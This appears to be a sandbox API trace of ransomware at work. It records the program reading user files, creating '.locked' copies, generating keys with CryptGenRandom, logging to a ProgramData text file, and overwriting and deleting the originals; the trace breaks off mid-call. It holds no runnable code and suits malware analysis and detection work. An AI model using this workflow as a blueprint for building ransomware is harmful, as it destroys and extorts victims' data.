[0299.841] ReadFile (in: hFile=0x1bc, lpBuffer=0x15784000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x15784000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0299.842] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0299.913] CloseHandle (hObject=0x180) returned 1 [0299.964] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0300.035] CloseHandle (hObject=0x1bc) returned 1 [0300.035] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0300.035] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12669e94 | out: lpMode=0x12669e94) returned 0 [0300.035] WriteFile (in: hFile=0x1bc, lpBuffer=0x1234a2c0*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x12669e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a2c0*, lpNumberOfBytesWritten=0x12669e64*=0x33, lpOverlapped=0x0) returned 1 [0300.036] CloseHandle (hObject=0x1bc) returned 1 [0300.037] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\VupTUE7Pb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vuptue7pb.xls")) returned 1 [0300.067] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0300.074] SetEvent (hEvent=0x198) returned 1 [0300.074] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0300.077] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0300.428] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390240*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x12390240*, lpNumberOfCharsWritten=0x12667a24*=0xb) returned 1 [0300.431] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0300.608] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\6wvQVTWOr1.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\6wvqvtwor1.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0300.608] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0300.608] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\6wvQVTWOr1.doc.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\6wvqvtwor1.doc.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0300.673] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0301.531] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0301.531] SetEvent (hEvent=0x214) returned 1 [0301.531] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0302.126] SetEvent (hEvent=0x12c) returned 1 [0302.126] SetEvent (hEvent=0x198) returned 1 [0302.126] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0302.197] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0303.066] WriteFile (in: hFile=0x1b0, lpBuffer=0x14256000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ee78, lpOverlapped=0x0 | out: lpBuffer=0x14256000*, lpNumberOfBytesWritten=0x1249ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0303.707] CloseHandle (hObject=0x1b0) returned 1 [0303.754] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0303.770] SetEvent (hEvent=0x104) returned 1 [0303.770] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0303.771] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0303.851] SetEvent (hEvent=0x198) returned 1 [0303.852] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\XxX9zS.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xxx9zs.ods")) returned 1 [0303.870] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0303.999] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0304.036] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\v4ns79y.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\v4ns79y.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0304.037] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0304.037] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\v4ns79y.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\v4ns79y.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0304.059] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0304.176] SetEvent (hEvent=0x190) returned 1 [0304.176] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0304.176] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0304.336] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0304.337] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0304.337] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0304.337] WriteFile (in: hFile=0x1b0, lpBuffer=0x123a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x123a7000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0304.339] ReadFile (in: hFile=0x1e0, lpBuffer=0x142ec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x142ec000*, lpNumberOfBytesRead=0x1239fd68*=0xfbd0, lpOverlapped=0x0) returned 1 [0304.342] WriteFile (in: hFile=0x1b0, lpBuffer=0x142ec000*, nNumberOfBytesToWrite=0xfbd0, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x142ec000*, lpNumberOfBytesWritten=0x1239fd74*=0xfbd0, lpOverlapped=0x0) returned 1 [0304.405] ReadFile (in: hFile=0x1e0, lpBuffer=0x142ec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x142ec000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0304.405] CloseHandle (hObject=0x1b0) returned 1 [0304.418] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0304.553] CloseHandle (hObject=0x1e0) returned 1 [0304.553] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0304.553] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0304.553] WriteFile (in: hFile=0x1e0, lpBuffer=0x124940a0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x124940a0*, lpNumberOfBytesWritten=0x1239fe64*=0x4b, lpOverlapped=0x0) returned 1 [0304.553] CloseHandle (hObject=0x1e0) returned 1 [0304.554] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\v4ns79y.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\v4ns79y.pptx")) returned 1 [0304.704] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0304.707] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0304.707] SetEvent (hEvent=0x150) returned 1 [0304.707] SetEvent (hEvent=0x104) returned 1 [0304.707] SetEvent (hEvent=0x184) returned 1 [0304.713] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0304.718] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0304.718] SetEvent (hEvent=0x1f0) returned 1 [0304.718] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0305.229] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0305.229] SetEvent (hEvent=0x104) returned 1 [0305.229] SetEvent (hEvent=0x184) returned 1 [0305.229] SetEvent (hEvent=0x20c) returned 1 [0305.246] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EzlWVPEgGWw7Xy7.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ezlwvpeggww7xy7.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0305.556] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0305.556] WriteFile (in: hFile=0x1b0, lpBuffer=0x1286a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.589] CloseHandle (hObject=0x1b0) returned 1 [0305.621] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0305.762] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EzlWVPEgGWw7Xy7.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ezlwvpeggww7xy7.ods")) returned 1 [0305.811] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.037] SetEvent (hEvent=0x12c) returned 1 [0306.037] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.059] SetEvent (hEvent=0x1f0) returned 1 [0306.059] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.396] SetEvent (hEvent=0x1e8) returned 1 [0306.396] SetEvent (hEvent=0x20c) returned 1 [0306.396] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.398] SetEvent (hEvent=0x1e8) returned 1 [0306.398] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.399] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\f4-p4sl_a3HK_SD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\f4-p4sl_a3hk_sd.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0306.399] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0306.399] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\f4-p4sl_a3HK_SD.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\f4-p4sl_a3hk_sd.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0306.402] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0306.402] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0306.402] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0306.402] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0306.402] WriteFile (in: hFile=0x19c, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0306.404] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0306.405] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0306.405] SetEvent (hEvent=0x150) returned 1 [0306.405] SetEvent (hEvent=0x1ac) returned 1 [0306.405] SetEvent (hEvent=0x1e8) returned 1 [0306.405] ReadFile (in: hFile=0x230, lpBuffer=0x1491a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x1491a000*, lpNumberOfBytesRead=0x12667d68*=0x18daa, lpOverlapped=0x0) returned 1 [0306.409] WriteFile (in: hFile=0x19c, lpBuffer=0x1491a000*, nNumberOfBytesToWrite=0x18daa, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x1491a000*, lpNumberOfBytesWritten=0x12667d74*=0x18daa, lpOverlapped=0x0) returned 1 [0306.417] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.777] ReadFile (in: hFile=0x230, lpBuffer=0x1491a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x1491a000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0306.777] CloseHandle (hObject=0x19c) returned 1 [0306.826] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0306.978] CloseHandle (hObject=0x230) returned 1 [0306.978] SetEvent (hEvent=0x14c) returned 1 [0306.978] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.091] SetEvent (hEvent=0x12c) returned 1 [0307.091] SetEvent (hEvent=0x20c) returned 1 [0307.091] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.298] SetEvent (hEvent=0x1ac) returned 1 [0307.298] SetEvent (hEvent=0x12c) returned 1 [0307.298] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.305] SetEvent (hEvent=0x1ac) returned 1 [0307.305] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.307] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0307.308] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1276ae94 | out: lpMode=0x1276ae94) returned 0 [0307.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1276ae64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x1276ae64*=0x3f, lpOverlapped=0x0) returned 1 [0307.308] CloseHandle (hObject=0x1a4) returned 1 [0307.309] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\f4-p4sl_a3HK_SD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\f4-p4sl_a3hk_sd.pptx")) returned 1 [0307.326] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.493] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\f4-p4sl_a3HK_SD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\f4-p4sl_a3hk_sd.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0307.704] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0307.997] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0307.998] WriteFile (in: hFile=0x1f4, lpBuffer=0x15212000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x15212000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0308.033] CloseHandle (hObject=0x1f4) returned 1 [0308.065] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\f4-p4sl_a3HK_SD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\f4-p4sl_a3hk_sd.pptx")) returned 1 [0308.174] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0308.244] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12665a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12665a24*=0xc) returned 1 [0308.297] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\dxPjxFmWasQOiEbDV.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\dxpjxfmwasqoiebdv.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0308.298] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0308.298] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\dxPjxFmWasQOiEbDV.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\dxpjxfmwasqoiebdv.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0308.367] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0308.484] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0308.484] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0308.484] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0308.484] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0308.485] WriteFile (in: hFile=0x208, lpBuffer=0x126ad000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12665d78, lpOverlapped=0x0 | out: lpBuffer=0x126ad000*, lpNumberOfBytesWritten=0x12665d78*=0x80, lpOverlapped=0x0) returned 1 [0308.489] ReadFile (in: hFile=0x218, lpBuffer=0x15ba0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x15ba0000*, lpNumberOfBytesRead=0x12665d68*=0xedf6, lpOverlapped=0x0) returned 1 [0308.493] WriteFile (in: hFile=0x208, lpBuffer=0x15ba0000*, nNumberOfBytesToWrite=0xedf6, lpNumberOfBytesWritten=0x12665d74, lpOverlapped=0x0 | out: lpBuffer=0x15ba0000*, lpNumberOfBytesWritten=0x12665d74*=0xedf6, lpOverlapped=0x0) returned 1 [0308.508] ReadFile (in: hFile=0x218, lpBuffer=0x15ba0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x15ba0000*, lpNumberOfBytesRead=0x12665d68*=0x0, lpOverlapped=0x0) returned 1 [0308.508] CloseHandle (hObject=0x208) returned 1 [0308.544] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0308.552] SetEvent (hEvent=0x134) returned 1 [0308.552] CloseHandle (hObject=0x218) returned 1 [0308.553] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0308.659] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0308.659] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12665e94 | out: lpMode=0x12665e94) returned 0 [0308.659] WriteFile (in: hFile=0x1bc, lpBuffer=0x12350230*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x12665e64, lpOverlapped=0x0 | out: lpBuffer=0x12350230*, lpNumberOfBytesWritten=0x12665e64*=0x63, lpOverlapped=0x0) returned 1 [0308.659] CloseHandle (hObject=0x1bc) returned 1 [0308.660] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\dxPjxFmWasQOiEbDV.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\dxpjxfmwasqoiebdv.wav")) returned 1 [0309.369] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0309.370] SetEvent (hEvent=0x1d0) returned 1 [0309.371] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0309.383] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0309.385] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0309.386] SetEvent (hEvent=0x1d0) returned 1 [0309.386] SetEvent (hEvent=0x1f0) returned 1 [0309.386] SetEvent (hEvent=0x21c) returned 1 [0309.386] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0309.387] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0309.387] SetEvent (hEvent=0x150) returned 1 [0309.387] SetEvent (hEvent=0x21c) returned 1 [0309.406] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0309.409] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0309.410] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0309.410] SetEvent (hEvent=0x21c) returned 1 [0309.412] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0309.413] SetEvent (hEvent=0x214) returned 1 [0309.413] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0309.873] SetEvent (hEvent=0x220) returned 1 [0309.873] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0309.892] WriteFile (in: hFile=0x200, lpBuffer=0x13356000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x13356000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.912] CloseHandle (hObject=0x200) returned 1 [0309.936] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\i4iTuepd632fb1KkZ.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i4ituepd632fb1kkz.pptx")) returned 1 [0309.954] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1239da24*=0xc) returned 1 [0310.012] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\tTnyiBf8Er6HDgClHWhw.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\ttnyibf8er6hdgclhwhw.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0310.012] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0310.013] CreateFileW 